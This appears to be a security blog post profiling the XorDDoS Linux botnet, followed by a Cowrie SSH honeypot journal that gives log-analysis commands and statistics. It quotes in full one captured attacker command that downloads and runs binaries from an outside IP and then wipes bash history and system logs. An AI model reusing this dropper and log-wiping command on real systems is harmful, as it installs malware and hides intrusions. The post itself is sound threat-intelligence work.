  • Primary Targets / Industries: Linux servers, cloud instances, IoT devices, and container/Docker hosts.
  • Geographic Focus: Global; historically heavy activity in Asia and frequent targeting of US-based infrastructure in recent waves.

Infection & Distribution

  • Common Delivery Vectors: SSH brute-force / credential compromise, automated scanning of exposed services, malicious scripts dropped after initial access.
  • Initial Access Methods: Brute-force or stolen SSH credentials, exploitation of exposed management interfaces, automated deployment scripts.

Technical Characteristics

  • Platform / Language: Multi-architecture Linux ELF binaries (x86, x64, ARM); often accompanied by shell scripts for installation.
  • Persistence Mechanisms: Multiple-install-step approach including installing rootkit components, cron/jobs, service wrappers and use of scripts to re-deploy persistence across reboots.
  • Command & Control (C2): Encrypted communications often using simple XOR-based obfuscation; C2 infrastructure has evolved and includes resilient controller nodes and domain/IP patterns.
  • Capabilities: High-capacity volumetric DDoS (various UDP/TCP/HTTP flood techniques), remote command execution, bot management, and sometimes lateral scanning for new victims.
  • Evasion Techniques: XOR obfuscation of strings/traffic, rootkit hiding to conceal files/processes, multi-stage installers that complicate detection and attribution.

Notable Campaigns / Incidents

  • Historic wave (2014–2015): Large brute-force campaigns that initially brought XorDDoS to light.
  • Resurgence / recent waves (2019–2025): Periodic resurgences with improved controllers and infrastructure; researchers documented a notable wave and new controller activity between late 2023 and early 2025.

Impact Assessment

  • Damage Potential: Medium to High. Primarily contributes to large-scale DDoS campaigns; infected hosts are turned into bots and can cause significant service disruption or be rented/sold for DDoS-for-hire.
  • Typical Victim Impact: Service downtime, increased bandwidth costs, potential secondary compromises if credentials are reused.

Indicators & Artifacts


Detection & Mitigation

  • Detection Tips: Monitor for high outbound DDoS traffic, sudden SSH login failures/successes (brute-force patterns), unexpected long-running ELF processes, hidden files/modules, and unusual cron/service entries.
  • Immediate Mitigation Steps: Isolate infected hosts from network, revoke SSH keys/passwords, rotate credentials, remove malicious persistence, patch exposed services, and restore from known-good images if rootkit compromise suspected.
  • Longer-term Recommendations: Harden SSH (disable password auth, use keys with MFA, rate-limit/geo-block where possible), apply least-privilege, enable host-based monitoring/EPP with rootkit detection, block known C2 domains/IPs at perimeter, and maintain IR playbooks for botnet infections.

WriteUp & Useful Resources

29.09.2025 – Honeypot Journal – SSH


Honeypot Details:

Type: SSH
Software used: Cowrie

Results

We publish partial results in our GitHub repository
The repository includes passwords that were employed in brute‑force attacks, as well as SSH keys that have been used to maintain persistent access.

Tools Used: grep, jq, cut, cat, sort, uniq, file

29.09.25

In today’s journal entry I review the notable events and statistics collected by my Cowrie SSH honeypot on September 29, 2025.

The Cowrie instance runs on an isolated virtual machine to minimize risk and contain any interaction. I log all authentication attempts and record every command executed during attacker sessions. Command input and session metadata are retained for analysis, but any files that attackers attempt to create are not persisted to disk on this honeypot; the environment uses an emulated filesystem and does not store uploaded artifacts. This design choice reduces operational risk and simplifies recovery, but it also means I do not currently capture potential malware or dropped files.

Planned next steps: I will deploy a second, dedicated honeypot configured to capture and retain file artifacts and binaries for deeper forensic analysis. That secondary system will be isolated and instrumented to safely collect samples for static and dynamic inspection while preserving the containment and OPSEC posture of the current Cowrie deployment.

Cowrie stores all collected data in a cowrie.json log file. This file captures detailed information about authentication attempts, executed commands, session metadata, and other interactions with the honeypot.

Below are some example entries extracted from the JSON file generated by Cowrie:

{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.655839Z","src_ip":"87.120.191.13","session":"51e74f48f036"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38722,"dst_ip":"172.26.0.2","dst_port":2222,"session":"50b8f390b79b","protocol":"ssh","message":"New connection: 87.120.191.13:38722 (172.26.0.2:2222) [session: 50b8f390b79b]","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.340065Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.657900Z","src_ip":"87.120.191.13","session":"83f0f267918f"}

Each entry in Cowrie is associated with an eventid, which allows us to track individual attacker actions throughout a session.

I have compiled a list of event IDs that Cowrie logs, providing an overview of the types of interactions and activities attackers perform on the honeypot.

Cowrie Event IDs

cowrie.client.fingerprint
ein angemeldeter SSH‑Public‑Key; username, fingerprint, key, type

cowrie.login.success
erfolgreiche Authentifizierung; username, password

cowrie.login.failed
fehlgeschlagene Authentifizierung; username, password

cowrie.client.size
Terminalgröße (SSH); width, height

cowrie.session.file_upload
hochgeladene Datei (z. B. via SFTP/SCP); filename, outfile, shasum

cowrie.command.input
vom Angreifer eingegebene Shell‑Befehle; input

cowrie.virustotal.scanfile
Datei an VirusTotal gesendet; sha256, is_new, positives, total

cowrie.session.connect
neue Verbindung (Session startet); src_ip, src_port, dst_ip, dst_port

cowrie.client.version
SSH‑Identification String; version

cowrie.client.kex
SSH Key‑Exchange Details; z. B. hassh, hasshAlgorithms, kexAlgs, keyAlgs

cowrie.session.closed
Session beendet; duration

cowrie.log.closed
TTY‑Log (session log) geschlossen; duration, ttylog (Dateiname), size, shasum, duplicate

cowrie.direct-tcpip.request
Anfrage zum Proxying (direct‑tcpip); dst_ip, dst_port, src_ip, src_port

cowrie.direct-tcpip.data
Daten, die über direct‑tcpip weitergeleitet werden sollten; dst_ip, dst_port

cowrie.client.var
variable Client‑Informationen; name, value

For an initial analysis I use grep to filter cowrie.json for specific eventid values. For today’s entry I will focus on the following areas:

  • Unique logins & geolocation: identify distinct successful authentications and map source IPs to countries
  • Notable executed commands: extract interesting or uncommon command sequences attackers ran
  • Longest sessions: find sessions with the greatest duration or highest command count
  • SSH keys: capture any public keys presented by clients or any key-related activity
  • Passwords: collect attempted passwords used during authentication attempts


Unique logins & geolocation

To extract all login attempts, I search for the following events: cowrie.login.success and cowrie.login.failed.
I use the following command to search for these two events:

grep "cowrie.login.*" | jq -r '.src_ip' | sort | uniq


To find out how many IP addresses attempted to connect:

grep "cowrie.login.*" cowrie.json.2025-09-29 | jq -r '.src_ip' | sort | uniq | wc -l
> 41

I now want to perform geolocation to generate statistics about the countries of the IP addresses.

For quick queries, I use the GeoIP tool. Unlike tools such as whois, GeoIP allows offline lookups, making it more efficient for bulk queries and simplifying the process of geolocating many IPs.

To generate statistics, we can use standard Linux tools. Here is a one-liner to create country statistics:

while read -r line; do geoiplookup "$line" | cut -d' ' -f5- >> countries.tmp; done < ips.txt; sort < countries.tmp | uniq -c | sort -rn ; rm countries.tmp

The result:

China is the clear leader for today, followed by the United States, with Romania taking third place.


Notable executed commands

Since traffic on the honeypot remains modest, we can generate an overview of all distinct commands executed to identify potential candidates for deeper analysis:

grep "cowrie.command.input" cowrie.json | jq -r '.input' | sort | uniq

As we can see, quite a lot is happening here. Most of this activity comes from scanners that spend the entire day probing the Internet for open SSH ports and attempting to log in using password lists. Targets can include dedicated and cloud servers, IoT devices, industrial systems, and more.

Data collected from honeypots can be useful for several reasons:

  • IP Tracking: Attackers can be identified and reported.
  • Behavior Analysis: Record and analyze attacker behavior within the honeypot.
  • Malware Analysis: Track and store malware installed by attackers for further analysis.

Beyond the common background noise generated by these scanners, occasional attempts to install malware can be observed.

Here is what I found in today’s logs:

wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://23.160.56.64/p.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://23.160.56.64/p.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://23.160.56.64/p.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://23.160.56.64/r.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://23.160.56.64/r.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://23.160.56.64/r.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /var/run/gcc.pid; exit $?

Security warning: Do not download the file unless you know what you’re doing!

I downloaded p.txt and took a closer look at the file. A quick inspection reveals that it is not a text file but an ELF binary.

> file p.txt 
p.txt: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped

To verify what type of malware this is, I uploaded the file to VirusTotal.

Now we know a bit more about the mysterious p.txt: it is the XorDDoS malware.

XorDDoS is a Linux-based malware that infects devices via weak SSH passwords or exposed services. It obfuscates its communication using XOR, turns infected systems into botnet nodes, and is primarily used to carry out DDoS attacks. Linux servers, IoT devices, and cloud systems are particularly targeted.

Read More about the XORDDoS Malware here:

References (Click to Open)

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos
https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware
https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices
https://blog.talosintelligence.com/unmasking-the-new-xorddos-controller-and-infrastructure
https://thehackernews.com/2025/04/experts-uncover-new-xorddos-controller.html
https://research.splunk.com/stories/xorddos/
https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/elf_xorddos.txt


Longest sessions

A beneficial side effect of operating a honeypot is the stolen time that scanners can never get back. Efficient botnet construction, when scanning the Internet for open ports, depends on speed. Smart scanners will ideally detect honeypots early and terminate the session once identified; any time an attacker spends on our honeypot is time they cannot use to infect other systems. With only a few honeypots this effect is marginal, but it scales: the more honeypots deployed across the Internet, the more attacker time is wasted.

I generate time-based statistics from the cowrie.session.closed event, since it includes session duration information.

In the log it looks like this:

{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"38749a7943fc","timestamp":"2025-09-29T23:57:44.723554Z","src_ip":"92.118.39.62","session":"33b169382dae"}

To generate concrete statistics from that, I use the following command:

cat cowrie.json.2025-09-29 | grep "cowrie.session.closed" | cut -d':' -f4 | cut -d' ' -f 4  | sort | uniq | sort -rn | head

The longest session therefore lasted 274 minutes, i.e. about 4 hours 34 minutes

Now I want to calculate the total time all attackers spent on my system. For that I reuse my previous query and use awk to sum all durations.

cat cowrie.json.2025-09-29 | grep "cowrie.session.closed" | cut -d':' -f4 | cut -d' ' -f 4  | sort | uniq | sort -rn | awk '{for(i=1;i<=NF;i++) sum+=$i} END{print sum/60}'
> 30.6267

Overall, attackers spent 30 minutes on the system that day. That may seem insignificant at first, but it scales dramatically when extrapolated across hundreds or thousands of honeypots.


SSH-Keys

To gain persistent access, attackers often try to install SSH keys. These can provide valuable indicators to identify attackers early or attribute attacks to a particular actor. Since I have only found RSA public keys in the logs so far, I will explicitly search for those. However, attackers could theoretically use other algorithms for their SSH keys, so this command would need to be adjusted accordingly, currently I only filter for RSA keys. To extract these from the logs I use the following command:

cat cowrie.json | grep -o 'ssh-rsa A[A-Za-z0-9+/=]\+' | sort | uniq

If you want to scan for other SSH public keys, consider searching for ecdsa-sha2-*, ssh-ed25519, or ssh-dss as well.

Note: In my GitHub repository you can find all logs and analyses I have collected.


Passwords

Another interesting aspect is generating a password list from the attackers’ login attempts. These password lists can be used to verify the strength of our own passwords, but also for other purposes such as detecting default credentials that may be embedded in applications. Such defaults are frequently abused to build botnets and remain a persistent problem, partly because some vendors do not take it seriously or, in some cases, include weak credentials intentionally.

To filter the passwords from today’s log I use the following command:

cat cowrie.json.2025-09-29 | grep "cowrie.login.*" | cut -d':' -f3,4 | cut -d '"' -f2,6 | grep -v '^"' | sed 's/"/:/' | sort | uniq

In total, I was able to identify 855 unique passwords for today.

Note: In my GitHub repository you can find all logs and analyses I have collected.